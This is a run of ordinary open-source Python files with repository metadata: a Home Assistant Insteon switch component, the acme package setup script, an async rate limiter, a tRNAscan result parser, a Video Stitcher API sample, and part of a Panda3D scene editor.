    # Show an error if this method is called while we are already configuring
if device_id in _CONFIGURING:
configurator.notify_errors(
_CONFIGURING[device_id], 'Failed to register, please try again.')
return
def insteon_switch_config_callback(data):
"""The actions to do when our configuration callback is called."""
setup_switch(device_id, data.get('name'), insteonhub, hass,
add_devices_callback)
_CONFIGURING[device_id] = configurator.request_config(
hass, 'Insteon Switch ' + model + ' addr: ' + device_id,
insteon_switch_config_callback,
description=('Enter a name for ' + model + ' addr: ' + device_id),
entity_picture='/static/images/config_insteon.png',
submit_caption='Confirm',
fields=[{'id': 'name', 'name': 'Name', 'type': ''}]
)
def setup_switch(device_id, name, insteonhub, hass, add_devices_callback):
"""Set up the switch."""
if device_id in _CONFIGURING:
request_id = _CONFIGURING.pop(device_id)
configurator = get_component('configurator')
configurator.request_done(request_id)
_LOGGER.info("Device configuration done!")
conf_switch = config_from_file(hass.config.path(INSTEON_LOCAL_SWITCH_CONF))
if device_id not in conf_switch:
conf_switch[device_id] = name
if not config_from_file(
hass.config.path(INSTEON_LOCAL_SWITCH_CONF), conf_switch):
_LOGGER.error("Failed to save configuration file")
device = insteonhub.switch(device_id)
add_devices_callback([InsteonLocalSwitchDevice(device, name)])
def config_from_file(filename, config=None):
"""Small configuration file management function."""
if config:
# We're writing configuration
try:
with open(filename, 'w') as fdesc:
fdesc.write(json.dumps(config))
except IOError as error:
_LOGGER.error("Saving configuration file failed: %s", error)
return False
return True
else:
# We're reading config
if os.path.isfile(filename):
try:
with open(filename, 'r') as fdesc:
return json.loads(fdesc.read())
except IOError as error:
_LOGGER.error("Reading config file failed: %s", error)
# This won't work yet
return False
else:
return {}
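# A hypothetical round-trip sketch (not part of the original component) showing
# how config_from_file() above both persists and reloads the device-name
# mapping; the path and device id below are illustrative only.
def _example_config_roundtrip(path='/tmp/insteon_local_switch_demo.conf'):
    if config_from_file(path, {'aa.bb.cc': 'Porch Switch'}):
        return config_from_file(path)  # -> {'aa.bb.cc': 'Porch Switch'}
    return {}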
class InsteonLocalSwitchDevice(SwitchDevice):
"""An abstract Class for an Insteon node."""
def __init__(self, node, name):
"""Initialize the device."""
self.node = node
self.node.deviceName = name
self._state = False
@property
def name(self):
"""Return the the name of the node."""
return self.node.deviceName
@property
def unique_id(self):
"""Return the ID of this Insteon node."""
return 'insteon_local_{}'.format(self.node.device_id)
@util.Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update(self):
"""Get the updated status of the switch."""
resp = self.node.status(0)
if 'cmd2' in resp:
self._state = int(resp['cmd2'], 16) > 0
@property
def is_on(self):
"""Return the boolean response if the node is on."""
return self._state
def turn_on(self, **kwargs):
"""Turn device on."""
self.node.on()
self._state = True
def turn_off(self, **kwargs):
"""Turn device off."""
self.node.off()
self._state = False
| {
"content_hash": "c8ef36a9ce85f36bc5ce2694dc9ca2ec",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 33.4320987654321,
"alnum_prop": 0.6100443131462334,
"repo_name": "keerts/home-assistant",
"id": "6935ad21abe0f6af6022da0d9cb97190a37b1663",
"size": "5416",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/switch/insteon_local.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1546272"
},
{
"name": "Python",
"bytes": "5270263"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "14079"
}
],
"symlink_target": ""
} |
import sys
from setuptools import setup
from setuptools import find_packages
version = '0.2.0.dev0'
install_requires = [
# load_pem_private/public_key (>=0.6)
# rsa_recover_prime_factors (>=0.8)
'cryptography>=0.8',
'ndg-httpsclient', # urllib3 InsecurePlatformWarning (#304)
'pyasn1', # urllib3 InsecurePlatformWarning (#304)
# Connection.set_tlsext_host_name (>=0.13), X509Req.get_extensions (>=0.15)
'PyOpenSSL>=0.15',
'pyrfc3339',
'pytz',
'requests',
'setuptools', # pkg_resources
'six',
'werkzeug',
]
# env markers in extras_require cause problems with older pip: #517
if sys.version_info < (2, 7):
install_requires.extend([
# only some distros recognize stdlib argparse as already satisfying
'argparse',
'mock<1.1.0',
])
else:
install_requires.append('mock')
docs_extras = [
'Sphinx>=1.0', # autodoc_member_order = 'bysource', autodoc_default_flags
'sphinx_rtd_theme',
'sphinxcontrib-programoutput',
]
testing_extras = [
'nose',
'tox',
]
setup(
name='acme',
version=version,
description='ACME protocol implementation in Python',
url='https://github.com/letsencrypt/letsencrypt',
author="Let's Encrypt Project",
author_email='[email protected]',
license='Apache License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Security',
],
packages=find_packages(),
include_package_data=True,
install_requires=install_requires,
extras_require={
'docs': docs_extras,
'testing': testing_extras,
},
entry_points={
'console_scripts': [
'jws = acme.jose.jws:CLI.run',
],
},
test_suite='acme',
)
| {
"content_hash": "3476e1eb26dd3af535fa3b029fb2ae9a",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 79,
"avg_line_length": 27,
"alnum_prop": 0.608656849620705,
"repo_name": "goofwear/letsencrypt",
"id": "e35b40d6e2ff0e9f839b4f9000d1fb7d19501abf",
"size": "2241",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "acme/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "14147"
},
{
"name": "Augeas",
"bytes": "4729"
},
{
"name": "Batchfile",
"bytes": "35037"
},
{
"name": "DIGITAL Command Language",
"bytes": "133"
},
{
"name": "Groff",
"bytes": "222"
},
{
"name": "Makefile",
"bytes": "37309"
},
{
"name": "Nginx",
"bytes": "4274"
},
{
"name": "Python",
"bytes": "1234907"
},
{
"name": "Shell",
"bytes": "26945"
}
],
"symlink_target": ""
} |
from asyncio import Lock, sleep
from time import time
class AsyncFrequency(object):
"""AsyncFrequency controller, means concurrent running n tasks every interval seconds.
Basic Usage::
from torequests.frequency_controller.async_tools import AsyncFrequency
from asyncio import ensure_future, get_event_loop
from time import time
async def test_async():
frequency = AsyncFrequency(2, 1)
async def task():
async with frequency:
return time()
now = time()
tasks = [ensure_future(task()) for _ in range(5)]
result = [await task for task in tasks]
assert result[0] - now < 1
assert result[1] - now < 1
assert result[2] - now > 1
assert result[3] - now > 1
assert result[4] - now > 2
assert frequency.to_dict() == {'n': 2, 'interval': 1}
assert frequency.to_list() == [2, 1]
get_event_loop().run_until_complete(test_async())
"""
__slots__ = ("gen", "__aenter__", "repr", "_lock", "n", "interval")
TIMER = time
def __init__(self, n=None, interval=0):
self.n = n
self.interval = interval
if n:
self.gen = self.generator(n, interval)
self._lock = None
self.__aenter__ = self._acquire
self.repr = f"AsyncFrequency({n}, {interval})"
else:
self.gen = None
self.__aenter__ = self.__aexit__
self.repr = "AsyncFrequency(unlimited)"
def to_list(self):
"""Return the [self.n, self.interval]"""
return [self.n, self.interval]
def to_dict(self):
"""Return the dict {'n': self.n, 'interval': self.interval}"""
return {'n': self.n, 'interval': self.interval}
@property
def lock(self):
# lazy init loop
if self._lock is None:
self._lock = Lock()
return self._lock
async def generator(self, n, interval):
q = [0] * n
while 1:
for index, i in enumerate(q):
# or timeit.default_timer()
now = self.TIMER()
diff = now - i
if diff < interval:
await sleep(interval - diff)
now = self.TIMER()
q[index] = now
                # Python 3.8+ needs a lock to guard generator access; 3.6 and 3.7 do not
yield now
@classmethod
def ensure_frequency(cls, frequency):
"""Ensure the given args is AsyncFrequency.
:param frequency: args to create a AsyncFrequency instance.
:type frequency: AsyncFrequency / dict / list / tuple
:return: AsyncFrequency instance
:rtype: AsyncFrequency
"""
if isinstance(frequency, cls):
return frequency
elif isinstance(frequency, dict):
return cls(**frequency)
else:
return cls(*frequency)
async def _acquire(self):
async with self.lock:
return await self.gen.asend(None)
async def __aexit__(self, *args):
pass
def __str__(self):
return repr(self)
def __repr__(self):
return self.repr
def __bool__(self):
return bool(self.gen)
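# Hypothetical usage (not part of the original module): ensure_frequency()
# above accepts an existing instance, a mapping, or a positional sequence and
# normalizes them to AsyncFrequency.
def _example_ensure_frequency():
    a = AsyncFrequency.ensure_frequency({'n': 2, 'interval': 1})
    b = AsyncFrequency.ensure_frequency((2, 1))
    return a.to_list(), b.to_dict()  # -> ([2, 1], {'n': 2, 'interval': 1})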
| {
"content_hash": "b80d94ddd9b3a9f2e45ddc50981e7f20",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 90,
"avg_line_length": 30.945454545454545,
"alnum_prop": 0.5185076380728555,
"repo_name": "ClericPy/torequests",
"id": "3500d431b53f0e0ade00c71e0eab6d849ce77f62",
"size": "3404",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "torequests/frequency_controller/async_tools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "1052"
},
{
"name": "Python",
"bytes": "221340"
}
],
"symlink_target": ""
} |
"""
Copyright [2009-2021] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import typing as ty
import attr
from attr.validators import instance_of as is_a
from attr.validators import optional
def intron_endpoint(raw: str) -> ty.Optional[int]:
if raw == "0":
return None
return int(raw)
@attr.s()
class TRnaScanResults:
sequence_id = attr.ib(validator=is_a(str))
hit_index = attr.ib(validator=is_a(int))
sequence_start = attr.ib(validator=is_a(int))
sequence_stop = attr.ib(validator=is_a(int))
anticodon = attr.ib(validator=is_a(str))
trna_type = attr.ib(validator=is_a(str))
intron_start = attr.ib(validator=optional(is_a(int)))
intron_stop = attr.ib(validator=optional(is_a(int)))
score = attr.ib(validator=is_a(float))
note = attr.ib(validator=is_a(str))
@classmethod
def from_line(cls, line: str) -> "TRnaScanResults":
parts = [p.strip() for p in line.split("\t")]
return cls(
sequence_id=parts[0],
hit_index=int(parts[1]),
sequence_start=int(parts[2]),
sequence_stop=int(parts[3]),
anticodon=parts[5],
trna_type=parts[4],
intron_start=intron_endpoint(parts[6]),
intron_stop=intron_endpoint(parts[7]),
score=float(parts[8]),
note=parts[9],
)
@property
def is_pseduo(self) -> bool:
return "pseudo" in self.note
| {
"content_hash": "d972a475795e88b954d5feef44245bf9",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 72,
"avg_line_length": 33.758620689655174,
"alnum_prop": 0.6618998978549541,
"repo_name": "RNAcentral/rnacentral-import-pipeline",
"id": "89dd4ceb8a03ee615aae5a30b3fed39f88d438e6",
"size": "1983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rnacentral_pipeline/databases/data/trnascan.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "18451"
},
{
"name": "Dockerfile",
"bytes": "3405"
},
{
"name": "Groovy",
"bytes": "6339"
},
{
"name": "HTML",
"bytes": "10430"
},
{
"name": "Makefile",
"bytes": "1197"
},
{
"name": "Nextflow",
"bytes": "104756"
},
{
"name": "PLpgSQL",
"bytes": "15906"
},
{
"name": "PostScript",
"bytes": "965516"
},
{
"name": "Python",
"bytes": "1623134"
},
{
"name": "Rust",
"bytes": "181197"
},
{
"name": "Shell",
"bytes": "23155"
}
],
"symlink_target": ""
} |
from google.cloud.video import stitcher_v1
def sample_update_slate():
# Create a client
client = stitcher_v1.VideoStitcherServiceClient()
# Initialize request argument(s)
request = stitcher_v1.UpdateSlateRequest(
)
# Make the request
response = client.update_slate(request=request)
# Handle the response
print(response)
# [END videostitcher_v1_generated_VideoStitcherService_UpdateSlate_sync_62ab4011]
| {
"content_hash": "34df8412998635c6e9660e7f3ae15207",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 81,
"avg_line_length": 24.666666666666668,
"alnum_prop": 0.7319819819819819,
"repo_name": "googleapis/python-video-stitcher",
"id": "8985aa3bdfa871811bca362d42e9c0d355df1fbd",
"size": "1854",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/videostitcher_v1_generated_video_stitcher_service_update_slate_sync_62ab4011.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "1027964"
},
{
"name": "Shell",
"bytes": "30684"
}
],
"symlink_target": ""
} |
import sys
try: import _tkinter
except: sys.exit("Please install python module 'Tkinter'")
import direct
from direct.directbase.DirectStart import*
from direct.showbase.TkGlobal import spawnTkLoop
from Tkinter import *
from tkFileDialog import *
from direct.directtools.DirectGlobals import *
from direct.tkwidgets.AppShell import*
from SideWindow import*
from duplicateWindow import*
from lightingPanel import *
from seMopathRecorder import *
from seSession import *
from quad import *
from sePlacer import *
from seFileSaver import *
from propertyWindow import *
import seParticlePanel
from collisionWindow import *
from direct.gui.DirectGui import *
from MetadataPanel import *
from seBlendAnimPanel import *
from controllerWindow import *
from AlignTool import *
import os
import string
from direct.tkwidgets import Dial
from direct.tkwidgets import Floater
from direct.tkwidgets import Slider
from direct.actor import Actor
import seAnimPanel
from direct.task import Task
import math
#################################################################
# All scene and window objects will be stored in here.
# So any event that will or needs to change scene contents
# should be written in here or imported into here!
#################################################################
from dataHolder import* ## Use this thing to Save/load data.
AllScene = dataHolder()
class myLevelEditor(AppShell):
## overridden the basic app info ##
appname = 'Scene Editor - New Scene'
appversion = '1.0'
copyright = ('Copyright 2004 E.T.C. Carnegie Mellon U.' +
' All Rights Reserved')
contactname = 'Jesse Schell, Shalin Shodhan & YiHong Lin'
contactphone = '(412) 268-5791'
contactemail = '[email protected]'
frameWidth = 1024
frameHeight = 80
frameIniPosX = 0
frameIniPosY = 0
usecommandarea = 0
usestatusarea = 0
padx = 5
pady = 5
sideWindowCount = 0
## Basic World default setting (For side window)
worldColor = [0,0,0,0]
lightEnable = 1
ParticleEnable = 1
basedriveEnable = 0
collision = 1
backface = 0
texture = 1
wireframe = 0
grid = 0
widgetVis = 0
enableAutoCamera = 1
enableControl = False
controlType = 'Keyboard'
keyboardMapDict = {}
keyboardSpeedDict = {}
Scene=None
isSelect = False
nodeSelected = None
undoDic = {}
redoDic = {}
animPanel = {}
animBlendPanel = {}
propertyWindow = {}
CurrentFileName=None #Holds the current scene file name
CurrentDirName=None # Holds the current file name without extension which is the path where file's data gets saved
Dirty=0 # Keeps track of whether there are any modifications that should be saved
def __init__(self, parent = None, **kw):
base.setBackgroundColor(0,0,0)
self.parent = parent
## Check TkTool is activated! ##
self.wantTK = config.GetBool('want-tk', 0)
if self.wantTK:
pass
else:
taskMgr.remove('tkloop')
spawnTkLoop()
## Set up window frame
INITOPT = Pmw.INITOPT
optiondefs = (
('title', self.appname, None),
)
self.defineoptions(kw, optiondefs)
AppShell.__init__(self, parent)
self.parent.geometry('%dx%d+%d+%d' % (self.frameWidth, self.frameHeight,self.frameIniPosX,self.frameIniPosY))
        ###### Put the directLabel on the screen to show the selected object data
self.posLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.90),
text = "Position : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.hprLabel = DirectLabel(
relief = None,
pos = (-1.3 , 0, 0.80),
text = "Orientation: H: 00.00 P: 00.00 R: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.scaleLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.70),
text = "Scale : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.initialiseoptions(myLevelEditor)
self.parent.resizable(False,False) ## Disable the ability to resize for this Window.
######### Set the event handler ##########
self.dataFlowEvents = [
## Event from Side Window
['SW_lightToggle',self.lightToggle],
['SW_collisionToggle',AllScene.toggleCollisionVisable],
['SW_particleToggle',self.toggleParticleVisable],
['SW_close',self.sideWindowClose],
## From Duplication Window
['DW_duplicating',self.duplicationObj],
## From Animation Panel
['AW_AnimationLoad',self.animationLoader],
['AW_removeAnim',self.animationRemove],
['AW_close',self.animPanelClose],
## From Blending Animation Window
['BAW_saveBlendAnim',self.animBlendPanelSave],
['BAW_removeBlendAnim',self.animBlendPanelRemove],
['BAW_renameBlendAnim',self.animBlendPanelRename],
['BAW_close',self.animBlendPanelClose],
## From Lighting Panel
['LP_selectLight', self.lightSelect],
['LP_addLight',self.addLight],
['LP_rename',self.lightRename],
['LP_removeLight',self.removeLight],
['LP_close',self.lightingPanelClose],
## From MotionPath Panel
['mPath_bindPathToNode',AllScene.bindCurveToNode],
['mPath_requestCurveList', self.requestCurveList],
['mPath_close', self.mopathClosed],
## From Property Window
['PW_removeCurveFromNode', AllScene.removeCurveFromNode],
['PW_removeAnimFromNode', AllScene.removeAnimation],
['PW_toggleLight', AllScene.toggleLightNode],
['PW_close', self.closePropertyWindow],
## From collisionWindow
['CW_addCollisionObj', AllScene.addCollisionObject],
## From AlignWindow
['ALW_close', self.closeAlignPanel],
['ALW_align', self.alignObject],
## From controllerWindow
['ControlW_close', self.closeInputPanel],
['ControlW_require', self.requestObjFromControlW],
['ControlW_controlSetting', self.setControlSet],
['ControlW_controlEnable', self.startControl],
['ControlW_controlDisable', self.stopControl],
['ControlW_saveSetting', AllScene.saveControlSetting],
## From Placer
['Placer_close', self.closePlacerPanel],
## From Particle Panel
['ParticlePanle_close', self.closeParticlePanel],
            ## From SEditor object which is an altered DirectSession
['SEditor-ToggleWidgetVis',self.toggleWidgetVis],
['SEditor-ToggleBackface',self.toggleBackface],
['SEditor-ToggleTexture',self.toggleTexture],
['SEditor-ToggleWireframe',self.toggleWireframe],
['ParticlePanel_Added_Effect',self.addParticleEffect],
['f11',self.loadFromBam],
['f12',self.saveAsBam],
]
#################################
### Collision detection
#################################
self.cTrav = CollisionTraverser()
base.cTrav = self.cTrav
for event in self.dataFlowEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
self.actionEvents = [
# Scene graph explorer functions
['SGE_changeName', self.changeName],
['SGE_Properties', self.openPropertyPanel],
['SGE_Duplicate', self.duplicate],
['SGE_Remove', self.remove],
['SGE_Add Dummy', self.addDummyNode],
['SGE_Add Collision Object', self.addCollisionObj],
['SGE_Metadata', self.openMetadataPanel],
['SGE_Set as Reparent Target', self.setAsReparentTarget],
['SGE_Reparent to Target', self.reparentToNode],
['SGE_Animation Panel', self.openAnimPanel],
['SGE_Blend Animation Panel', self.openBlendAnimPanel],
['SGE_MoPath Panel', self.openMoPathPanel],
['SGE_Align Tool', self.openAlignPanel],
['SGE_Flash', self.flash],
['SGE_madeSelection', self.selectNode],
['select',self.selectNode],
['deselect', self.deSelectNode],
['se_selectedNodePath',self.selectFromScene],
['se_deselectedAll',self.deselectFromScene],
]
''' All messages starting with "SGE_" are generated in seSceneGraphExplorer'''
for event in self.actionEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
camera.toggleVis()
self.selectNode(base.camera) ## Initially, we select camera as the first node...
def appInit(self):
#################################################################
# appInit(self)
# Initialize the application.
# This function will be called when you call AppShell's constructor
#################################################################
### Create SceneEditor Ver. DirectSession
self.seSession = SeSession()
self.seSession.enable()
SEditor.camera.setPos(0,-50,10)
self.placer=None
self.MopathPanel = None
self.alignPanelDict = {}
#self.quadview=QuadView()
self.lightingPanel = None
self.controllerPanel = None
self.particlePanel = None
### Create Side Window
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.sideWindow.selectPage()
messenger.send('SGE_Update Explorer',[render]) ## Update the Scene Graph
pass
def getPhotoImage(self,name):
modpath = ConfigVariableSearchPath("model-path")
path = modpath.findFile(Filename(name))
return PhotoImage(file=path.toOsSpecific())
def createInterface(self):
# The interior of the toplevel panel
interior = self.interior()
#######################################################
### Creating the Buttons in the window frame
#######################################################
buttonFrame = Frame(interior)
self.image=[]
self.image.append(self.getPhotoImage('models/icons/new.gif'))#0
self.image.append(self.getPhotoImage('models/icons/open.gif'))#1
self.image.append(self.getPhotoImage('models/icons/save.gif'))#2
self.image.append(self.getPhotoImage('models/icons/model.gif'))#3
self.image.append(self.getPhotoImage('models/icons/actor.gif'))#4
self.image.append(self.getPhotoImage('models/icons/placer.gif'))#5
self.image.append(self.getPhotoImage('models/icons/mopath.gif'))#6
self.image.append(self.getPhotoImage('models/icons/lights.gif'))#7
self.image.append(self.getPhotoImage('models/icons/particles.gif'))#8
self.image.append(self.getPhotoImage('models/icons/control.gif'))
self.image.append(self.getPhotoImage('models/icons/help.gif'))#9
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
i = 0
for element in self.image:
i += 1
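# Note: i is captured as a default argument (n=i) so each button keeps its own
# index; a plain closure over i would make every button report the last index.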
button = Button(buttonFrame, image = element, command=lambda n=i : self.buttonPushed(n))
button.pack(fill=X, side = LEFT)
buttonFrame.pack(fill=X, side=LEFT,expand=True)
def buttonPushed(self, buttonIndex):
#################################################################
# buttonPushed(self, buttonIndex)
# This function will handle all button events from the top level window.
# It takes the button index as a reference to tell which button has been pushed.
#################################################################
####
#### Change here to process the button event further.
####
if buttonIndex==1: # New Scene
self.newScene()
return
elif buttonIndex==2: # Open Scene
self.openScene()
return
elif buttonIndex==3: # Save Scene
self.saveScene()
return
elif buttonIndex==4: # Load Model
self.loadModel()
return
elif buttonIndex==5: # Load Actor
self.loadActor()
return
elif buttonIndex==6: # Open Placer
self.openPlacerPanel()
return
elif buttonIndex==7: # Open Mopath Panel
self.openMoPathPanel()
return
elif buttonIndex==8: # Open Lighting Panel
self.openLightingPanel()
return
elif buttonIndex==9: # Open Particle Panel
self.openParticlePanel()
return
elif buttonIndex==10:
self.openInputPanel()
return
elif buttonIndex==11: # Help
self.showAbout()
return
elif buttonIndex==12:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==13:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==14:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==15:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==16:
print "Your scene will be eliminated within five seconds, Save your world!!!, Number %d."%buttonIndex
return
elif buttonIndex==17:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==18:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==19:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==20:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
return
def createMenuBar(self):
# Creates default menus. Can be overridden or simply augmented
# Using button Add below
self.menuBar.addmenuitem('Help', 'command',
'Get information on application',
label='About...', command=self.showAbout)
## Create stuff inside the "File" menu
self.menuBar.addmenuitem('File', 'command', 'Create New Scene',
label='New Scene',
command=self.newScene)
self.menuBar.addmenuitem('File', 'command', 'Open a Scene',
label='Open Scene',
command=self.openScene)
self.menuBar.addmenuitem('File', 'command', 'Save a Scene',
label='Save Scene',
command=self.saveScene)
self.menuBar.addmenuitem('File', 'command', 'Save Scene as...',
label='Save as...',
command=self.saveAsScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Load Model',
label='Load Model',
command=self.loadModel)
self.menuBar.addmenuitem('File', 'command', 'Load Actor',
label='Load Actor',
command=self.loadActor)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Import a Scene',
label='Import...',
command=self.importScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Quit this application',
label='Exit',
command=self.quit)
## Creat "Edit" on the menu and its stuff
self.menuBar.addmenu('Edit', 'Editting tools')
self.menuBar.addmenuitem('Edit', 'command', 'Un-do',
label='Undo...',
command=self.unDo)
self.menuBar.addmenuitem('Edit', 'command', 'Re-do',
label='Redo...',
command=self.reDo)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Deselect nodepath',
label='Deselect',
command=self.deSelectNode)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Add a Dummy',
label='Add Dummy',
command=self.addDummy)
self.menuBar.addmenuitem('Edit', 'command', 'Duplicate nodepath',
label='Duplicate',
command=self.duplicateNode)
self.menuBar.addmenuitem('Edit', 'command', 'Remove the nodepath',
label='Remove',
command=self.removeNode)
self.menuBar.addmenuitem('Edit', 'command', 'Show the object properties',
label='Object Properties',
command=self.showObjProp)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Show the Camera setting',
label='Camera Setting',
command=self.showCameraSetting)
self.menuBar.addmenuitem('Edit', 'command', 'Render setting',
label='Render Setting',
command=self.showRenderSetting)
## Creat "Panel" on the menu and its stuff
self.menuBar.addmenu('Panel', 'Panel tools')
self.menuBar.addmenuitem('Panel', 'command', 'Open Side Window',
label='Side Window',
command=self.openSideWindow)
self.menuBar.addmenuitem('Panel', 'command', 'Placer Panel',
label='Placer Panel',
command=self.openPlacerPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Animation Panel',
label='Animation Panel',
command=self.openAnimationPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Motion Path Panel',
label='Mopath Panel',
command=self.openMopathPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Lighting Panel',
label='Lighting Panel',
command=self.openLightingPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Particle Panel',
label='Particle Panel',
command=self.openParticlePanel)
self.menuBar.addmenuitem('Panel', 'separator')
self.menuBar.addmenuitem('Panel', 'command', 'Input control Panel',
label='Input device panel',
command=self.openInputPanel)
self.menuBar.pack(fill=X, side = LEFT)
## get "Menu" items in order to control the entry status
self.menuFile = self.menuBar.component('File-menu')
self.menuEdit = self.menuBar.component('Edit-menu')
self.menuPanel = self.menuBar.component('Panel-menu')
## Disable entries when user doesn't select anything
if not self.isSelect:
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
self.menuPanel.entryconfig('Animation Panel', state=DISABLED)
self.menuPanel.entryconfig('Side Window', state=DISABLED)
def onDestroy(self, event):
#################################################################
# If you have opened anything, please clean it up here!
#################################################################
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
pass
def closeAllSubWindows(self):
#################################################################
# closeAllSubWindows(self)
# This function will close all sub windows, if there are any, except the side window.
#################################################################
if self.lightingPanel != None:
self.lightingPanel.quit()
if self.placer != None:
self.placer.quit()
if self.MopathPanel != None:
self.MopathPanel.quit()
if self.particlePanel != None:
self.particlePanel.quit()
if self.controllerPanel != None:
self.controllerPanel.quit()
list = self.animPanel.keys()
for index in list:
self.animPanel[index].quit()
list = self.animBlendPanel.keys()
for index in list:
self.animBlendPanel[index].quit()
list = self.propertyWindow.keys()
for index in list:
self.propertyWindow[index].quit()
list = self.alignPanelDict.keys()
for index in list:
self.alignPanelDict[index].quit()
self.animPanel.clear()
self.animBlendPanel.clear()
self.propertyWindow.clear()
self.alignPanelDict.clear()
return
## Processing message events
def makeDirty(self):
self.Dirty=1
def removeLight(self, lightNode):
#################################################################
# removeLight(self, lightNode)
# This function will be called when the user tries to remove a light from the lightingPanel
# (by sending out the message).
# So, in here we will call dataHolder (AllScene) to remove the light
# and return a list containing the newest light data in the scene.
# Then, this function will reset the lighting list in the lightingPanel.
#################################################################
list = AllScene.removeObj(lightNode)
if self.lightingPanel != None:
self.lightingPanel.updateList(list)
return
def lightRename(self,oName, nName):
#################################################################
# lightRename(self,oName, nName)
# This function will be called when the user tries to rename a light from the lightingPanel
# (by sending out the message).
# So, in here we will call dataHolder (AllScene) to rename the light
# and return a list containing the newest light data in the scene.
# Then, this function will reset the lighting list in the lightingPanel.
#################################################################
list, lightNode = AllScene.rename(oName, nName)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
return
def lightSelect(self,lightName):
#################################################################
# lightSelect(self,lightName)
# This function will be called when the user tries to select a light from the lightingPanel
# (by sending out the message)
